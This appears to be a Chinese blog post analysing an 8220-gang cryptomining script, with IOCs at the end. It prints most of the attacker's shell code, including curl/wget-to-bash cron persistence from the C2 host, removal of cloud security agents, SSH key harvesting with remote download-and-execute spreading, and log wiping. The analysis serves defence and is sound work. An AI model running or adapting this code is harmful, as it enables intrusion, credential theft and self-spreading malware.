新·8220挖矿团伙样本分析报告

前言

在队里看见一个IOC信息http://192.210.200.66:1234/xmss,溯源后发现是8220挖矿团伙的挖矿脚本,于是拿下来进行分析。

溯源

IP信息

参数
IP 192.210.200.66
地理位置 美国 伊利诺伊州 芝加哥
ASN 36352
注册机构 ColoCrossing
注册地址 Brisbane, Australia, 澳大利亚
开放端口 15, 22, 49, 80, 102, 123, 138, 443, 554, 902, 1110, 1177, 1234, 1458, 1515, 1604, 1972, 2067, 2082, 2121, 2727, 3338, 3350, 3371, 3374, 3386, 3397, 4022, 4040, 4592, 4911, 4991, 5353, 5357, 5900, 5901, 5984, 6000, 6001, 7676, 7777, 8009, 8080, 8087, 8090, 8098, 9051, 9160, 9333, 9943, 9981, 9999, 10051, 10250, 49152

反查域名信息:

apacheorg.top
w.apacheorg.top
agent.apacheorg.xyz
agent.apacheorg.top
apacheorg.xyz
w.apacheorg.xyz

涉及恶意文件

5d4f2a009db79009b1b86d416019d808
ca815ac01df52cd997ae83de9606d378
5efc68ad277fe3fc36bfdf7671d8b1de
d2f5ec8c97e56f11c5f517aed83ed8b2
3997fb6cd3b603aad1cd40360be6c205
47be2940ef6970954ce71e8ad6d74a74
b1582ac0cfbe7cef692d748d1bf4b4b3

挖矿脚本分析

既然先拿到脚本,就先对脚本各个函数梳理一遍。

关闭防火墙

setenforce 0 2>/dev/null 0表示关闭防火墙,2表示以stderr模式输出到/dev/null

优化性能

  1. 设定最大打开文件数:ulimit -n 65535

  2. 禁用防火墙:ufw disable

  3. 允许恶意网络连接传输

    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F
    
  4. 修改最大内存页hugepages以提高性能:echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf

  5. 禁用watchdog:echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf

清除同类挖矿样本

netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
echo "123"
netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
ps -fe | grep '/tmp' | grep -v '.rsyslogds'|grep -v '.libs'|grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
ps aux | grep -a -E "kdevtmpfsi|rot|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

设定Google公共DNS

if [ $(cat /etc/resolv.conf | grep 8.8.8.8|grep -v grep|wc -l) -eq '0' ];then
  echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
else
  echo "ok"
fi

卸载安全服务

卸载阿里云盾和监控服务,屏蔽阿里云盾IP

if ps aux | grep -i '[a]liyun'; then
    /etc/init.d/aegis uninstall
    (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
    sudo pkill aliyun-service
    killall -9 aliyun-service
    sudo pkill AliYunDun
    killall -9 AliYunDun
    iptables -I INPUT -s 100.100.30.1/28 -j DROP
    iptables -I INPUT -s 140.205.201.0/28 -j DROP
    iptables -I INPUT -s 140.205.201.16/29 -j DROP
    iptables -I INPUT -s 140.205.201.32/28 -j DROP
    iptables -I INPUT -s 140.205.225.192/29 -j DROP
    iptables -I INPUT -s 140.205.225.200/30 -j DROP
    iptables -I INPUT -s 140.205.225.184/29 -j DROP
    iptables -I INPUT -s 140.205.225.183/32 -j DROP
    iptables -I INPUT -s 140.205.225.206/32 -j DROP
    iptables -I INPUT -s 140.205.225.205/32 -j DROP
    iptables -I INPUT -s 140.205.225.195/32 -j DROP
    iptables -I INPUT -s 140.205.225.204/32 -j DROP
    rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
    rm -rf /usr/local/aegis*
    systemctl stop aliyun.service
    systemctl disable aliyun.service
    service bcm-agent stop
    yum remove bcm-agent -y
    apt-get remove bcm-agent -y
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop
    /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove
    rm -rf /usr/local/cloudmonitor

卸载腾讯云镜

  elif ps aux | grep -i '[y]unjing'; then
    process=(sap100 secu-tcs-agent sgagent64 barad_agent agent agentPlugInD pvdriver )
    for i in ${process[@]}
    do
      for A in $(ps aux | grep $i | grep -v grep | awk '{print $2}')
      do
        kill -9 $A
      done
    done
    chkconfig --level 35 postfix off
    service postfix stop
    /usr/local/qcloud/stargate/admin/stop.sh
    /usr/local/qcloud/stargate/admin/uninstall.sh
    /usr/local/qcloud/YunJing/uninst.sh
    /usr/local/qcloud/monitor/barad/admin/stop.sh
    /usr/local/qcloud/monitor/barad/admin/uninstall.sh
    rm -rf /usr/local/sa
    rm -rf /usr/local/agenttools
    rm -rf /usr/local/qcloud
    rm -f /etc/cron.d/sgagenttask

设定下载命令

if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB

定时脚本下载/更新,并执行

cronlow(){
  cr=$(crontab -l | grep -q $url | wc -l)
  # 检测crontab中是否有恶意脚本的下载/更新任务
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab -
  else
    echo "cronlow skip"
  fi
}

将定时任务写入以下位置

/etc/cron.d/`whoami`
/etc/cron.d/apache
/var/spool/cron/`whoami`
/var/spool/cron/crontabs/`whoami`
/etc/cron.hourly/oanacroner1
cron(){
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"
  then
    chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
    crontab -r
  fi
  if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep "$url"
  then
    echo "Cron exists"
  else
    apt-get install -y cron
    yum install -y vixie-cron crontabs
    service crond start
    chkconfig --level 35 crond on
    echo "Cron not found"
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami`
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache
    echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami`
    mkdir -p /var/spool/cron/crontabs
    echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami`
    mkdir -p /etc/cron.hourly
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
    echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down
    chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/down
  fi
  chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1
  echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down
}

搜集用户信息进行传播

搜集用户ssh端口用户列表主机列表登录凭证信息,并尝试进行登录,然后下载下载执行xmss挖矿脚本

localgo() {
  echo "localgo start"
  myhostip=$(curl -sL icanhazip.com)
  KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  )
  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  i=0
  for user in $userlist; do
    for host in $hostlist; do
      for key in $keylist; do
        for sshp in $sshports; do
          ((i++))
          if [ "${i}" -eq "20" ]; then
            sleep 5
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi

          #Wait 5 seconds after every 20 attempts and clean up hanging processes

          chmod +r $key
          chmod 400 $key
          echo "$user@$host"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
          ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$ipurl/xmss||wget -q -O - http://$ipurl/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$ipurl/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
        done
      done
    done
  done
  # scangogo
  echo "local done"
}

安装挖矿服务

setupxmrservice(){
  echo "[*] Removing previous c3pool miner (if any)"
  if sudo -n true 2>/dev/null; then
    sudo systemctl stop c3pool_miner.service
  fi
  killall -9 xmrig

  echo "[*] Removing $HOME/c3pool directory"
  rm -rf $HOME/c3pool
  mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
  if [ $(netstat -antp|grep 'rsyslogds'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ];then
    $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
    # preparing script

    echo "[*] Creating $HOME/c3pool/miner.sh script"
    mv /tmp/.rsyslogds.sh /usr/sbin/.rsyslogds.sh
    chmod +x /usr/sbin/.rsyslogds.sh
    /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
    # preparing script background work and work under reboot
    if ! grep .rsyslogds.sh $HOME/.profile >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to $HOME/.profile"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>$HOME/.profile
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if ! grep rsyslogds.sh /etc/rc.d/rc.local >/dev/null; then
      echo "[*] Adding $HOME/c3pool/miner.sh script to /etc/rc.d/rc.local"
      echo "/usr/sbin/.rsyslogds.sh >/dev/null 2>&1" >>/etc/rc.d/rc.local
    else 
      echo "Looks like $HOME/c3pool/miner.sh script is already in the $HOME/.profile"
    fi

    if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
      echo "[*] Enabling huge pages"
      echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
      sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    fi

    if ! type systemctl >/dev/null; then

      echo "[*] Running miner in the background (see logs in $HOME/c3pool/xmrig.log file)"
      /bin/bash /usr/sbin/.rsyslogds.sh >/dev/null 2>&1
      echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."
      echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."

    else

      echo "[*] Creating c3pool_miner systemd service"
      sudo mv /tmp/rsyslogds.service /etc/systemd/system/rsyslogds.service
      echo "[*] Starting c3pool_miner systemd service"
      sudo killall xmrig 2>/dev/null
      sudo systemctl daemon-reload
      sudo systemctl enable rsyslogds.service
      sudo systemctl start rsyslogds.service
      echo "To see miner service logs run \"sudo journalctl -u c3pool_miner -f\" command"
    fi
  fi
}

这里安装了挖矿程序e5c3720e14a5ea7f678e0a9835d28283

恶意脚本整体流程分析

# 杀掉阿里云云盾、腾讯云镜
der

if [ -w /usr/sbin ]; then
    SPATH=/usr/sbin
  else
  SPATH=/tmp
fi
echo $SPATH

# 创建.rsyslogds.sh文件,最后启动挖矿服务用到
cat >/tmp/.rsyslogds.sh <<EOL
#!/bin/bash
# 文件v中是MD5嘛,用以校验.rsyslogds文件的MD5值
x_md51 = `curl http://agent.apacheorg.xyz:1234/v`
x_md52 = `md5sum /usr/sbin/.rsyslogds| awk '{print $1}'`
# 校验MD5
if [ "$x_md52" = "$x_md51" ]; then
  # 如果.rsyslogds在进程中没有启动,则启动.rsyslogds
  if ! pidof .rsyslogds >/dev/null; then
    /usr/sbin/.rsyslogds
  fi
else
  # 如果MD5不相同,则从远端下载.rsyslogds程序,并杀掉非真.rsyslogds,运行真.rsyslogds
  $DLB /usr/sbin/.rsyslogds $ipurl/.rsyslogds;chmod +x /usr/sbin/.rsyslogds
  pkill .rsyslogds
  /usr/sbin/.rsyslogds
fi
EOL

# 创建rsyslogds守护进程
cat >/tmp/rsyslogds.service <<EOL
[Unit]
Description=rsyslogdservice
[Service]
ExecStart=/usr/sbin/.rsyslogds
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL

MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"
MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`

# 这里看有没有这个路径,没有路径表明肯定没有.rsyslogds文件
if [ "$SPATH" = "/usr/sbin" ]
then
  # 同样这,本地校验.rsyslogds, 的MD5值这里应该写错了,应该是不等于
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]
  then
    # .rsyslogds文件MD5相同,下载并运行.rsyslogds
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    # 启动挖矿服务
    setupxmrservice
    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
    localgo
    # 设定脚本下载/更新的定时任务
    cron
  else
    # 运行挖矿程序
    $SPATH/.rsyslogds
    # 启动服务
    setupxmrservice
    # 搜集ssh端口、用户列表、主机列表、凭证列表进行登录,传播挖矿脚本
    localgo
    # 设定脚本下载/更新的定时任务
    cron
  fi
else
  # 下载并运行恶意程序.rsyslogds
  $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
  # 设置脚本执行的定时任务
  cronlow
fi

# 脚本会检查.inis文件是否存在,不存在就从远端下载后拖到后台运行
if [ $(ps aux|grep inis|grep -v grep|wc -l) -eq '0' ];
then
  $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
  cd $SPATH
  nohup ./.inis &
else
  echo "ok"
fi

history -c
der
echo 0>/root/.ssh/authorized_keys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cronrot
echo 0>~/.bash_history

.inis文件

#!/bin/bash
if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
echo $DLB
if [ -w /usr/sbin ]; then
  SPATH=/usr/sbin
else
  SPATH=/tmp
fi
kill(){
  ps aux | grep -v '.rsyslogds' |grep -v '.libs'| grep -v grep | awk '{if($3>50.0) print $2}' | while read procid
  do
    kill -9 $procid
  done
}
while true; do
  ipurl="http://agent.apacheorg.top:1234"
  MD5_1_XMR = `curl -fsSL $ipurl/v||wget -q -O - $ipurl/v`
  MD5_2_XMR=`md5sum $SPATH/.rsyslogds | awk '{print $1}'`
  # 这里我怀疑也是写错了,应该是不等于
  if [ "$MD5_1_XMR" = "$MD5_2_XMR" ]; then
    if [ $(ps -aux|grep '.rsyslogds'|grep -v grep|wc -l) -eq '0' ];then
      $SPATH/.rsyslogds
    else
      echo "ok"
    fi
  else
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;$SPATH/.rsyslogds
    chattr +ai $SPATH/.rsyslogds
  fi
  kill
  sleep 1m
done

挖矿程序分析:.rsyslogds

基本信息

参数
文件名 .rsyslogds
MD5 e5c3720e14a5ea7f678e0a9835d28283
SHA256 86843e8a0b7079ab20e0f258600ef597b04ffc35d8a706d250e4122bd1cc4692
文件类型 ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), statically linked, stripped
文件大小 2077172 bytes
其他信息 upx

程序分析

upx脱壳后,打开发现

!

这就是用的现成的XMRig挖矿项目编译,版本为6.7.1,编译日期为2021/01/12

提取到钱包地址:48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

IOC信息

MD5
e5c3720e14a5ea7f678e0a9835d28283
51cf7dde4003aa6901918e373bf91b18
01972190a83b183b56064d82045de8d6
caa9ea2c522fc6268c7e976142d48775

IP
205.185.113.151
194.156.99.30
5.196.247.12
205.185.116.78
192.210.200.66

domain
bash.givemexyz.xyz
bash.givemexyz.in
agent.apacheorg.top

URL
http://192.210.200.66:1234/xmss
http://192.210.200.66:1234/v
http://192.210.200.66:1234/.rsyslogds
http://192.210.200.66:1234/.inis
http://205.185.113.59:1234/xmss
http://205.185.113.59:1234/v
http://205.185.113.59:1234/.rsyslogds
http://205.185.113.59:1234/.inis
http://agent.apacheorg.top:1234/v
http://agent.apacheorg.top:1234/xmss
http://agent.apacheorg.top:1234/.rsyslogds
http://agent.apacheorg.top:1234/.inis

钱包地址
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF
posted @ 2021-11-09 14:53  Hk_Mayfly  阅读(1392)  评论(2编辑  收藏  举报